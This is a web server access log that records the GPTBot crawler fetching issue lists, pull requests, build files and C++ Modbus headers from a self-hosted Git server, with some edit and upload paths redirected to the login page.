"/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:18:58:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:58:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:58:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/build.ninja?display=source" [Client 74.7.227.38] [Length 16431] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:18:58:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11635] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:58:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18928] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:58:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/build.ninja?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:18:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:58:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:58:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:58:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15847] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:18:58:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py?display=source" [Client 74.7.227.38] [Length 25659] [Gzip 7.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py" -[17/Feb/2026:18:58:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10922] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp" -[17/Feb/2026:18:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:58:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:58:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10090] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:58:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:18:58:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:18:58:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:18:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:18:58:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:18:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:18:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12720] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:18:58:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11651] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:18:58:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 12045] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:18:58:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12236] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:18:58:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13345] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:18:58:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13060] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:18:58:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12966] [Gzip 4.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:18:58:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12263] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:18:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11810] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:18:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13563] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:18:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10317] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:18:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10145] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:18:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9890] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:18:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10788] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:18:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 13137] [Gzip 6.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:18:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10148] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:18:58:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9858] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:18:58:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 1600] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:18:58:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 1025] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:18:58:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9858] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:58:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:18:58:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:18:58:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 1602] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:18:58:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11583] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:18:58:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:18:58:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:18:58:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr 